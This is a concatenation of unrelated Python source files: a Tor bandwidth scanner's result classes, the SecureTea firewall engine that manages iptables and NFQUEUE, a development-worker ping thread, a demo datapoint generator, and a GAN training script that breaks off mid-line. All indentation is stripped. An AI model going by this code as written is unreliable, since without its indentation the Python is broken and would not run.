Error = 'error-misc'
ErrorCircuit = 'error-circ'
ErrorStream = 'error-stream'
ErrorAuth = 'error-auth'
# When a second relay suitable to measure a relay can not be found.
# It is used in ``ResultErrorSecondRelay``.
ErrorSecondRelay = 'error-second-relay'
# When there is not a working destination Web Server.
# It is used in ``ResultErrorDestination``.
ErrorDestination = 'error-destination'
class Result:
"""A bandwidth measurement for a relay.
It re-implements :class:`~sbws.lib.relaylist.Relay` as an inner class.
"""
class Relay:
"""A Tor relay.
It re-implements :class:`~sbws.lib.relaylist.Relay`
with the attributes needed.
.. note:: in a future refactor it would be simpler if a ``Relay`` has
measurements and a measurement has a relay,
instead of every measurement re-implementing ``Relay``.
"""
def __init__(self, fingerprint, nickname, address, master_key_ed25519,
average_bandwidth=None, burst_bandwidth=None,
observed_bandwidth=None, consensus_bandwidth=None,
consensus_bandwidth_is_unmeasured=None,
# Counters to be stored by relay and not per measurement,
# since the measurements might fail.
relay_in_recent_consensus_count=None,
relay_recent_measurement_attempt_count=None,
relay_recent_priority_list_count=None):
"""
Initializes a ``Result.Relay``.
.. note:: in a future refactor the attributes should be dynamic
to ease adding/removing them.
They are shared by :class:`~sbws.lib.relaylist.Relay` and
:class:`~sbws.lib.v3bwfile.V3BWLine` and should not be
repeated in every class.
"""
self.fingerprint = fingerprint
self.nickname = nickname
self.address = address
self.master_key_ed25519 = master_key_ed25519
self.average_bandwidth = average_bandwidth
self.burst_bandwidth = burst_bandwidth
self.observed_bandwidth = observed_bandwidth
self.consensus_bandwidth = consensus_bandwidth
self.consensus_bandwidth_is_unmeasured = \
consensus_bandwidth_is_unmeasured
self.relay_in_recent_consensus_count = \
relay_in_recent_consensus_count
self.relay_recent_measurement_attempt_count = \
relay_recent_measurement_attempt_count
self.relay_recent_priority_list_count = \
relay_recent_priority_list_count
def __init__(self, relay, circ, dest_url, scanner_nick, t=None,
relay_in_recent_consensus_count=None):
"""
Initializes the measurement and the relay with all the relay attributes.
"""
self._relay = Result.Relay(
relay.fingerprint, relay.nickname,
relay.address, relay.master_key_ed25519,
relay.average_bandwidth,
relay.burst_bandwidth,
relay.observed_bandwidth,
relay.consensus_bandwidth,
relay.consensus_bandwidth_is_unmeasured,
relay.relay_in_recent_consensus_count,
relay.relay_recent_measurement_attempt_count,
relay.relay_recent_priority_list_count
)
self._circ = circ
self._dest_url = dest_url
self._scanner = scanner_nick
self._time = time.time() if t is None else t
@property
def type(self):
raise NotImplementedError()
@property
def relay_average_bandwidth(self):
return self._relay.average_bandwidth
@property
def relay_burst_bandwidth(self):
return self._relay.burst_bandwidth
@property
def relay_observed_bandwidth(self):
return self._relay.observed_bandwidth
@property
def consensus_bandwidth(self):
return self._relay.consensus_bandwidth
@property
def consensus_bandwidth_is_unmeasured(self):
return self._relay.consensus_bandwidth_is_unmeasured
@property
def fingerprint(self):
return self._relay.fingerprint
@property
def nickname(self):
return self._relay.nickname
@property
def address(self):
return self._relay.address
@property
def master_key_ed25519(self):
return self._relay.master_key_ed25519
@property
def relay_in_recent_consensus_count(self):
"""Number of times the relay was in a consensus."""
return self._relay.relay_in_recent_consensus_count
@property
def relay_recent_measurement_attempt_count(self):
"""Returns the relay recent measurements attemps.
It is initialized in :class:`~sbws.lib.relaylist.Relay` and
incremented in :func:`~sbws.core.scanner.main_loop`.
"""
return self._relay.relay_recent_measurement_attempt_count
@property
def relay_recent_priority_list_count(self):
"""Returns the relay recent "prioritization"s to be measured.
It is initialized in :class:`~sbws.lib.relaylist.Relay` and
incremented in :func:`~sbws.core.scanner.main_loop`.
"""
return self._relay.relay_recent_priority_list_count
@property
def circ(self):
return self._circ
@property
def dest_url(self):
return self._dest_url
@property
def scanner(self):
return self._scanner
@property
def time(self):
return self._time
@property
def version(self):
return RESULT_VERSION
def to_dict(self):
return {
'fingerprint': self.fingerprint,
'nickname': self.nickname,
'address': self.address,
'master_key_ed25519': self.master_key_ed25519,
'circ': self.circ,
'dest_url': self.dest_url,
'time': self.time,
'type': self.type,
'scanner': self.scanner,
'version': self.version,
'relay_in_recent_consensus_count':
self.relay_in_recent_consensus_count,
'relay_recent_measurement_attempt_count':
self.relay_recent_measurement_attempt_count,
'relay_recent_priority_list_count':
self.relay_recent_priority_list_count,
}
@staticmethod
def from_dict(d):
"""
Returns a :class:`~sbws.lib.resultdump.Result` subclass from a
dictionary.
Returns None if the ``version`` attribute is not
:const:`~sbws.globals.RESULT_VERSION`
It raises ``NotImplementedError`` when the dictionary ``type`` can not
be parsed.
.. note:: in a future refactor, the conversions to/from
object-dictionary will be simpler using ``setattr`` and ``__dict__``
``version`` is not being used and should be removed.
"""
assert 'version' in d
if d['version'] != RESULT_VERSION:
return None
assert 'type' in d
if d['type'] == _ResultType.Success.value:
return ResultSuccess.from_dict(d)
elif d['type'] == _ResultType.Error.value:
return ResultError.from_dict(d)
elif d['type'] == _ResultType.ErrorCircuit.value:
return ResultErrorCircuit.from_dict(d)
elif d['type'] == _ResultType.ErrorStream.value:
return ResultErrorStream.from_dict(d)
elif d['type'] == _ResultType.ErrorAuth.value:
return ResultErrorAuth.from_dict(d)
elif d['type'] == _ResultType.ErrorSecondRelay.value:
return ResultErrorSecondRelay.from_dict(d)
elif d['type'] == _ResultType.ErrorDestination.value:
return ResultErrorDestination.from_dict(d)
else:
raise NotImplementedError(
'Unknown result type {}'.format(d['type']))
def __str__(self):
return json.dumps(self.to_dict())
class ResultError(Result):
def __init__(self, *a, msg=None, **kw):
super().__init__(*a, **kw)
self._msg = msg
@property
def type(self):
return _ResultType.Error
@property
def freshness_reduction_factor(self):
'''
When the RelayPrioritizer encounters this Result, how much should it
adjust its freshness? (See RelayPrioritizer.best_priority() for more
information about "freshness")
A higher factor makes the freshness lower (making the Result seem
older). A lower freshness leads to the relay having better priority,
and better priority means it will be measured again sooner.
The value 0.5 was chosen somewhat arbitrarily, but a few weeks of live
network testing verifies that sbws is still able to perform useful
measurements in a reasonable amount of time.
'''
return 0.5
@property
def msg(self):
return self._msg
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultError(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
d.update({
'msg': self.msg,
})
return d
class ResultErrorCircuit(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorCircuit
@property
def freshness_reduction_factor(self):
'''
There are a few instances when it isn't the relay's fault that the
circuit failed to get built. Maybe someday we'll try detecting whose
fault it most likely was and subclassing ResultErrorCircuit. But for
now we don't. So reduce the freshness slightly more than ResultError
does by default so priority isn't hurt quite as much.
A (hopefully very very rare) example of when a circuit would fail to
get built is when the sbws client machine suddenly loses Internet
access.
'''
return 0.6
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorCircuit(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorStream(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorStream
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorStream(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorSecondRelay(ResultError):
"""
Error when a second relay suitable to measure a relay could not be
found.
A second suitable relay is a relay that:
- Has at least equal bandwidth as the relay to measure.
- If the relay to measure is not an exit,
the second relay is an exit without `bad` flag and can exit to port 443.
- If the relay to measure is an exit, the second relay is not an exit.
It is instantiated in :func:`~sbws.core.scanner.measure_relay`.
.. note:: this duplicates code and adds more tech-debt,
since it's the same as the other
:class:`~sbws.lib.resultdump.ResultError` classes except for the
``type``.
In a future refactor, there should be only one ``ResultError`` class
and assign the type in the ``scanner`` module.
"""
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorSecondRelay
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorSecondRelay(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519']),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorDestination(ResultError):
"""
Error when there is not a working destination Web Server.
It is instantiated in :func:`~sbws.core.scanner.measure_relay`.
.. note:: this duplicates code and adds more tech-debt,
since it's the same as the other
:class:`~sbws.lib.resultdump.ResultError` classes except for the
``type``.
In a future refactor, there should be only one ``ResultError`` class
and assign the type in the ``scanner`` module.
"""
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorDestination
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorDestination(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519']),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultErrorAuth(ResultError):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
@property
def type(self):
return _ResultType.ErrorAuth
@property
def freshness_reduction_factor(self):
'''
Override the default ResultError.freshness_reduction_factor because a
ResultErrorAuth is most likely not the measured relay's fault, so we
shouldn't hurt its priority as much. A higher reduction factor means a
Result's effective freshness is reduced more, which makes the relay's
priority better.
The value 0.9 was chosen somewhat arbitrarily.
'''
return 0.9
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultErrorAuth(
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'],
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
msg=d['msg'], t=d['time'])
def to_dict(self):
d = super().to_dict()
return d
class ResultSuccess(Result):
def __init__(self, rtts, downloads, *a, **kw):
super().__init__(*a, **kw)
self._rtts = rtts
self._downloads = downloads
@property
def type(self):
return _ResultType.Success
@property
def rtts(self):
return self._rtts
@property
def downloads(self):
return self._downloads
@staticmethod
def from_dict(d):
assert isinstance(d, dict)
return ResultSuccess(
d['rtts'] or [], d['downloads'],
Result.Relay(
d['fingerprint'], d['nickname'], d['address'],
d['master_key_ed25519'], d['relay_average_bandwidth'],
d.get('relay_burst_bandwidth'), d['relay_observed_bandwidth'],
d.get('consensus_bandwidth'),
d.get('consensus_bandwidth_is_unmeasured'),
relay_in_recent_consensus_count= # noqa
d.get('relay_in_recent_consensus_count', None), # noqa
relay_recent_measurement_attempt_count= # noqa
d.get('relay_recent_measurement_attempt_count', None), # noqa
relay_recent_priority_list_count= # noqa
d.get('relay_recent_priority_list_count', None), # noqa
),
d['circ'], d['dest_url'], d['scanner'],
t=d['time'])
def to_dict(self):
d = super().to_dict()
d.update({
'rtts': self.rtts,
'downloads': self.downloads,
'relay_average_bandwidth': self.relay_average_bandwidth,
'relay_burst_bandwidth': self.relay_burst_bandwidth,
'relay_observed_bandwidth': self.relay_observed_bandwidth,
'consensus_bandwidth': self.consensus_bandwidth,
'consensus_bandwidth_is_unmeasured':
self.consensus_bandwidth_is_unmeasured,
})
return d
class ResultDump:
''' Runs the enter() method in a new thread and collects new Results on its
queue. Writes them to daily result files in the data directory '''
def __init__(self, args, conf):
assert os.path.isdir(conf.getpath('paths', 'datadir'))
self.conf = conf
self.fresh_days = conf.getint('general', 'data_period')
self.datadir = conf.getpath('paths', 'datadir')
self.data = {}
self.data_lock = RLock()
self.thread = Thread(target=self.enter)
self.queue = Queue()
try:
self.thread.start()
except RuntimeError as e:
fail_hard(e)
def store_result(self, result):
''' Call from ResultDump thread '''
assert isinstance(result, Result)
with self.data_lock:
fp = result.fingerprint
if fp not in self.data:
self.data[fp] = []
self.data[fp].append(result)
self.data = trim_results(self.fresh_days, self.data)
# Not calling trim_results_ip_changed here so as not to remove
# the results for a relay that has changed address.
# It will be called when loading the results to generate a v3bw
# file.
def handle_result(self, result):
''' Call from ResultDump thread. If we are shutting down, ignores
ResultError* types '''
assert isinstance(result, Result)
fp = result.fingerprint
nick = result.nickname
if isinstance(result, ResultError) and settings.end_event.is_set():
log.debug('Ignoring %s for %s %s because we are shutting down',
type(result).__name__, nick, fp)
return
self.store_result(result)
write_result_to_datadir(result, self.datadir)
if result.type == "success":
msg = "Success measuring {} ({}) via circuit {} and " \
"destination {}".format(
result.fingerprint, result.nickname, result.circ,
result.dest_url)
else:
msg = "Error measuring {} ({}) via circuit {} and " \
"destination {}: {}".format(
result.fingerprint, result.nickname, result.circ,
result.dest_url, result.msg)
log.info(msg)
def enter(self):
"""Main loop for the ResultDump thread.
When there are results in the queue, queue.get will fetch them until
there are no more or a timeout happens.
For every result it gets, it processes it and stores it in the filesystem,
which takes ~1 millisecond and will not trigger the timeout.
It can therefore store ~1000 results per second in the filesystem.
It does not accept any data type other than Result or a list of Results,
so it is not possible to put big data types in the queue.
If there are no results in the queue, it waits 1 second and checks
again.
"""
with self.data_lock:
self.data = load_recent_results_in_datadir(
self.fresh_days, self.datadir)
while not (settings.end_event.is_set() and self.queue.empty()):
try:
event = self.queue.get(timeout=1)
except Empty:
continue
data = event
if data is None:
log.debug('Got None in ResultDump')
continue
elif isinstance(data, list):
for r in data:
assert isinstance(r, Result)
self.handle_result(r)
elif isinstance(data, Result):
self.handle_result(data)
else:
log.warning('The only thing we should ever receive in the '
'result thread is a Result or list of Results. '
'Ignoring %s', type(data))
def results_for_relay(self, relay):
assert isinstance(relay, Relay)
fp = relay.fingerprint
with self.data_lock:
if fp not in self.data:
return []
return self.data[fp]
|
engine.py
|
# -*- coding: utf-8 -*-
u"""Firewall-Engine module for SecureTea Firewall.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Feb 12 2019
Version: 1.1
Module: SecureTea
"""
import datetime
from securetea import logger
import multiprocessing
import netfilterqueue
from securetea.lib.firewall.packet_filter import PacketFilter
from securetea.lib.firewall.firewall_monitor import FirewallMonitor
from securetea.lib.firewall import utils
class FirewallEngine(object):
"""Class for FirewallEngine.
Working:
Perform all the heavy lifting and parsing.
Call PacketFilter and Monitor.
"""
def __init__(self, cred, debug=False):
"""Initialize FirewallEngine."""
self.cred = cred
self.logger = logger.SecureTeaLogger(
__name__,
debug
)
# Parse and setup rules and actions
(self.ip_inbound,
self.action_inbound_IPRule) = self.parse_inbound_IPRule()
(self.ip_outbound,
self.action_outbound_IPRule) = self.parse_outbound_IPRule()
(self.protocols,
self.action_protocolRule) = self.parse_protocolRule()
(self.sports,
self.action_source_portRule) = self.parse_source_portRule()
(self.dports,
self.action_dest_portRule) = self.parse_dest_portRule()
(self.dns,
self.action_DNSRule) = self.parse_DNSRule()
(self.extensions,
self.action_scanLoad) = self.parse_scanLoad()
self.action_HTTPRequest = self.parse_HTTPRequest()
self.action_HTTPResponse = self.parse_HTTPResponse()
# Interface
self.interface = str(self.cred['interface'])
if self.interface == "":
self.interface = utils.get_interface()
# Setup PacketFilter object
self.packetFilterObj = PacketFilter(interface=self.interface,
debug=debug,
ip_inbound=self.ip_inbound,
ip_outbound=self.ip_outbound,
protocols=self.protocols,
dns=self.dns,
dports=self.dports,
sports=self.sports,
extensions=self.extensions,
action_inbound_IPRule=self.action_inbound_IPRule,
action_outbound_IPRule=self.action_outbound_IPRule,
action_DNSRule=self.action_DNSRule,
action_source_portRule=self.action_source_portRule,
action_dest_portRule=self.action_dest_portRule,
action_HTTPResponse=self.action_HTTPResponse,
action_HTTPRequest=self.action_HTTPRequest,
action_protocolRule=self.action_protocolRule,
action_scanLoad=self.action_scanLoad)
# Setup Monitor object
self.monitorObj = FirewallMonitor(interface=self.interface,
debug=debug)
# Integrations
self.integrations = ['Firewall',
'Monitor']
def restore_state(self):
"""
Restore the iptables state.
Args:
None
Raises:
None
Returns:
None
"""
resp = utils.excecute_command('iptables --flush')
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
def parse_inbound_IPRule(self):
"""
Parse the inbound IP rules and
generate ip_inbound list.
Args:
None
Raises:
None
Returns:
temp_ip_inbound (list): Parsed IP inbound list
action (int): 0 or 1
"""
try:
action = int(self.cred['inbound_IPRule']['action'])
temp_ip_inbound = []
if len(self.cred['inbound_IPRule']['ip_inbound']):
list_of_IPs = str(self.cred['inbound_IPRule']['ip_inbound'])
list_of_IPs = list_of_IPs.split(',')
for IP in list_of_IPs:
if '-' in IP:
for new_ip in utils.generate_IPs(IP):
if (new_ip not in temp_ip_inbound and
utils.check_ip(new_ip)):
temp_ip_inbound.append(str(new_ip).strip())
elif (utils.check_ip(IP)):
if IP not in temp_ip_inbound:
temp_ip_inbound.append(str(IP).strip())
return temp_ip_inbound, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_outbound_IPRule(self):
"""
Parse the outbound IP rules and
generate ip_outbound list.
Args:
None
Raises:
None
Returns:
temp_ip_outbound (list): Parsed IP outbound list
action (int): 0 or 1
"""
try:
action = int(self.cred['outbound_IPRule']['action'])
temp_ip_outbound = []
if len(self.cred['outbound_IPRule']['ip_outbound']):
list_of_IPs = str(self.cred['outbound_IPRule']['ip_outbound'])
list_of_IPs = list_of_IPs.split(',')
for IP in list_of_IPs:
if '-' in IP:
for new_ip in utils.generate_IPs(IP):
if (new_ip not in temp_ip_outbound and
utils.check_ip(new_ip)):
temp_ip_outbound.append(str(new_ip).strip())
elif (utils.check_ip(IP)):
if IP not in temp_ip_outbound:
temp_ip_outbound.append(str(IP).strip())
return temp_ip_outbound, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_protocolRule(self):
"""
Parse the protocol configurations passed.
Args:
None
Raises:
None
Returns:
temp_protocol (list): Parsed protocol list
action (int): 0 or 1
"""
try:
temp_protocol = []
action = int(self.cred['protocolRule']['action'])
if len(self.cred['protocolRule']['protocols']):
protocols = str(self.cred['protocolRule']['protocols'])
protocols = protocols.split(',')
protocols = map(utils.map_protocol, protocols)
protocols = list(protocols)
for protocol in protocols:
if (protocol and
protocol not in temp_protocol):
temp_protocol.append(protocol)
return temp_protocol, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_DNSRule(self):
"""
Parse the DNS configurations passed.
Args:
None
Raises:
None
Returns:
temp_DNS (list): Parsed DNS list
action (int): 0 or 1
"""
try:
temp_DNS = []
action = int(self.cred['DNSRule']['action'])
if len(self.cred['DNSRule']['dns']):
dns = str(self.cred['DNSRule']['dns'])
dns = dns.split(',')
for single_dns in dns:
if single_dns not in temp_DNS:
temp_DNS.append(str(single_dns).strip())
return temp_DNS, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_source_portRule(self):
"""
Parse the source port rules passed and
generate source ports list.
Args:
None
Raises:
None
Returns:
temp_sports (list): Parsed list of source ports
action (int): 0 or 1
"""
try:
temp_sports = []
action = int(self.cred['source_portRule']['action'])
if len(self.cred['source_portRule']['sports']):
sports = str(self.cred['source_portRule']['sports'])
sports = sports.split(',')
for port in sports:
if '-' in port:
for new_port in utils.generate_ports(port):
if (new_port not in temp_sports and
utils.check_port(new_port)):
temp_sports.append(str(new_port).strip())
elif utils.check_port(port):
if port not in temp_sports:
temp_sports.append(str(port).strip())
return temp_sports, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_dest_portRule(self):
"""
Parse the destination port rules passed and
generate destination ports list.
Args:
None
Raises:
None
Returns:
temp_dports (list): Parsed list of destination ports
action (int): 0 or 1
"""
try:
temp_dports = []
action = int(self.cred['dest_portRule']['action'])
if len(self.cred['dest_portRule']['dports']):
dports = str(self.cred['dest_portRule']['dports'])
dports = dports.split(',')
for port in dports:
if '-' in port:
for new_port in utils.generate_ports(port):
if (new_port not in temp_dports and
utils.check_port(new_port)):
temp_dports.append(str(new_port).strip())
elif utils.check_port(port):
if port not in temp_dports:
temp_dports.append(str(port).strip())
return temp_dports, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_HTTPResponse(self):
"""
Parse HTTPResponse configurations.
Args:
None
Raises:
None
Returns:
action (int): 0 or 1
"""
try:
action = int(self.cred['HTTPResponse']['action'])
return action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Allow HTTPResponse
return 1
def parse_HTTPRequest(self):
"""
Parse HTTPRequest configurations.
Args:
None
Raises:
None
Returns:
action (int): 0 or 1
"""
try:
action = int(self.cred['HTTPRequest']['action'])
return action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Allow HTTPRequest
return 1
def parse_scanLoad(self):
"""
Parse scan load configurations.
Args:
None
Raises:
None
Returns:
temp_extension (list): Parsed extension list
action (int): 0 or 1
"""
try:
temp_extension = []
action = int(self.cred['scanLoad']['action'])
if len(self.cred['scanLoad']['extensions']):
extensions = str(self.cred['scanLoad']['extensions'])
extensions = extensions.split(',')
for extension in extensions:
if extension not in temp_extension:
temp_extension.append(str(extension).strip())
return temp_extension, action
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
# Return empty list and block action
return [], 0
def parse_time(self):
"""
Parses the time passed and checks
with the current time.
Args:
None
Raises:
None
Returns:
bool
"""
try:
current_time = datetime.datetime.now()
time_lb = self.cred['time']['time_lb']
time_ub = self.cred['time']['time_ub']
datetime_lb = current_time.replace(hour=int((time_lb).split(':')[0]),
minute=int((time_lb).split(':')[1]))
datetime_ub = current_time.replace(hour=int((time_ub).split(':')[0]),
minute=int((time_ub).split(':')[1]))
if (current_time > datetime_lb and
current_time < datetime_ub):
return True
else:
return False
except Exception as e:
self.logger.log(
"Error: " + str(e),
logtype="error"
)
def process_packet(self, pkt):
"""
Process the packet passed to the PacketFilter.
If the current CPU time matches the time rule and
the packet satisfies the packet filter rules,
allow the packet, else drop the packet.
Args:
None
Raises:
None
Returns:
None
"""
if (self.packetFilterObj.process(pkt) and
self.parse_time()):
pkt.accept()
else:
pkt.drop()
def startFirewall(self):
"""
Setup netfilterqueue and start
processing packets in the queue.
Args:
None
Raises:
None
Returns:
None
"""
input_command = 'iptables -I INPUT -j NFQUEUE --queue-num 0'
output_command = 'iptables -I OUTPUT -j NFQUEUE --queue-num 0'
resp = utils.excecute_command(input_command)
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
resp = utils.excecute_command(output_command)
if resp[1]:
self.logger.log(
resp[1],
logtype="error"
)
try:
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, self.process_packet)
queue.run()
except KeyboardInterrupt:
# Restore iptables state
self.restore_state()
def startMonitor(self):
"""
Start the monitor engine.
Args:
None
Raises:
None
Returns:
None
"""
self.monitorObj.startMonitoring()
def startEngine(self):
"""
Start the FirewallEngine.
Working:
Spin up two processes, one for the core firewall engine
and the other for monitoring services.
Args:
None
Raises:
None
Returns:
None
"""
processes = []
firewallProcess = multiprocessing.Process(target=self.startFirewall)
monitorProcess = multiprocessing.Process(target=self.startMonitor)
firewallProcess.start()
monitorProcess.start()
processes.append(firewallProcess)
processes.append(monitorProcess)
self.logger.log(
"Integrations: " + str(self.integrations),
logtype="info"
)
for process in processes:
process.join()
|
worker.py
|
import attr
from threading import Thread, Event
from time import time
from ....config import deferred_config
from ....backend_interface.task.development.stop_signal import TaskStopSignal
from ....backend_api.services import tasks
class DevWorker(object):
prefix = attr.ib(type=str, default="MANUAL:")
report_stdout = deferred_config('development.worker.log_stdout', True)
report_period = deferred_config(
'development.worker.report_period_sec', 30.,
transform=lambda x: float(max(x, 1.0)))
ping_period = deferred_config(
'development.worker.ping_period_sec', 30.,
transform=lambda x: float(max(x, 1.0)))
def __init__(self):
self._dev_stop_signal = None
self._thread = None
self._exit_event = Event()
self._task = None
self._support_ping = False
def ping(self, timestamp=None):
try:
if self._task:
self._task.send(tasks.PingRequest(self._task.id))
except Exception:
return False
return True
def register(self, task, stop_signal_support=None):
if self._thread:
return True
if (stop_signal_support is None and TaskStopSignal.enabled) or stop_signal_support is True:
self._dev_stop_signal = TaskStopSignal(task=task)
self._support_ping = hasattr(tasks, 'PingRequest')
# if there is nothing to monitor, leave
if not self._support_ping and not self._dev_stop_signal:
return
self._task = task
self._exit_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
return True
def _daemon(self):
last_ping = time()
while self._task is not None:
try:
if self._exit_event.wait(min(self.ping_period, self.report_period)):
return
# send ping request
if self._support_ping and (time() - last_ping) >= self.ping_period:
self.ping()
last_ping = time()
if self._dev_stop_signal:
stop_reason = self._dev_stop_signal.test()
if stop_reason and self._task:
self._task._dev_mode_stop_task(stop_reason)
except Exception:
pass
def unregister(self):
self._dev_stop_signal = None
self._task = None
self._thread = None
self._exit_event.set()
return True
|
demo_dp_interface.py
|
import logging
from time import sleep
from random import random
from threading import Thread
from datetime import datetime, timezone
logger = logging.getLogger(__name__)
class DemoDPInterface():
"""
This is a demo version of a datapoint interface which pushes dummy values
and metadata into the DB to support the EMP Demo UI App.
"""
def __new__(cls, *args, **kwargs):
"""
Ensure singleton, i.e. only one instance is created.
"""
if not hasattr(cls, "_instance"):
# This magically calls __init__ with the correct arguments too.
cls._instance = object.__new__(cls)
else:
logger.warning(
"ConnectorMQTTIntegration is aldready running. Use "
"get_instance method to retrieve the running instance."
)
return cls._instance
@classmethod
def get_instance(cls):
"""
Return the running instance of the class.
Returns:
--------
instance: DemoDPInterface instance
The running instance of the class. Is None if not running yet.
"""
if hasattr(cls, "_instance"):
instance = cls._instance
else:
instance = None
return instance
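# Hypothetical usage of the singleton accessors above:
#   DemoDPInterface()                       # the first call creates the instance
#   same = DemoDPInterface.get_instance()   # later callers retrieve it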
def __init__(self):
"""
Spin off a thread to simulate asynchronous arrival of data.
"""
# This will be called twice on "./manage.py runserver" by django.
# The first time we wish to run this function, the second time we do not.
if not hasattr(self, "_is_initialized"):
# Logging useful information about the background workers seems to
# be a good idea, even if it is only a debug message.
logger.info("Starting DemoDPInterface.")
# This must be a thread as the save method of Datapoint spawns a
# signal. This signal is only received if sender and
# receiver live in the same process.
self.thread = Thread(target=self.push_data)
# Don't wait on this thread on shutdown.
self.thread.daemon = True
self.thread.start()
self._is_initialized = True
def push_data(self):
"""
Push fake values to Datapoint in DB for demo purposes.
"""
# Give the remaining components some time to spin up.
sleep(10)
# This can only be loaded once all apps are initialized.
from emp_main.models import Datapoint
# Updating/inserting metadata for a datapoint could look like this:
dp, created = Datapoint.objects.get_or_create(
external_id=1,
type="sensor"
)
dp.data_format = "continuous_numeric"
dp.description = "A dummy temperature like datapoint."
dp.min_value = 19.0
dp.max_value = 25.0
dp.unit = "°C"
dp.save()
while True:
# Generate a random value in the range of a typical temperature
value = round(22 + random() * 3, 1)
timestamp_as_dt = datetime.now(timezone.utc)
# Updating the value for an existing datapoint could look like
# this. Specifying update_fields is good practice and allows
# methods listening to the save signals to determine if relevant
# information has been updated.
# Please ensure that the new values match the fields. E.g.
# last_value is a string field but will also accept a number. However,
# the methods listening to post_save (e.g. consumers notifying the
# user about new data) will expect a string.
dp = Datapoint.objects.get(external_id=1)
dp.last_value = str(value)
dp.last_value_timestamp = timestamp_as_dt
dp.save(update_fields=["last_value", "last_value_timestamp"])
sleep(5)
|
main_gan_L2_regularized_yelp.py
|
import datetime
import numpy as np
import tensorflow as tf
import threading
import os
from ganrl.common.cmd_args import cmd_args
from ganrl.experiment_user_model.data_utils import Dataset
from ganrl.experiment_user_model.utils import UserModelLSTM, UserModelPW
def multithread_compute_vali():
global vali_sum, vali_cnt
vali_sum = [0.0, 0.0, 0.0, 0.0]
vali_cnt = 0
threads = []
for ii in xrange(cmd_args.num_thread):
thread = threading.Thread(target=vali_eval, args=(1, ii))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return vali_sum[0]/vali_cnt, vali_sum[1]/vali_cnt, vali_sum[2]/vali_cnt, vali_sum[3]/vali_cnt
def vali_eval(xx, ii):
global vali_sum, vali_cnt
vali_thread_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
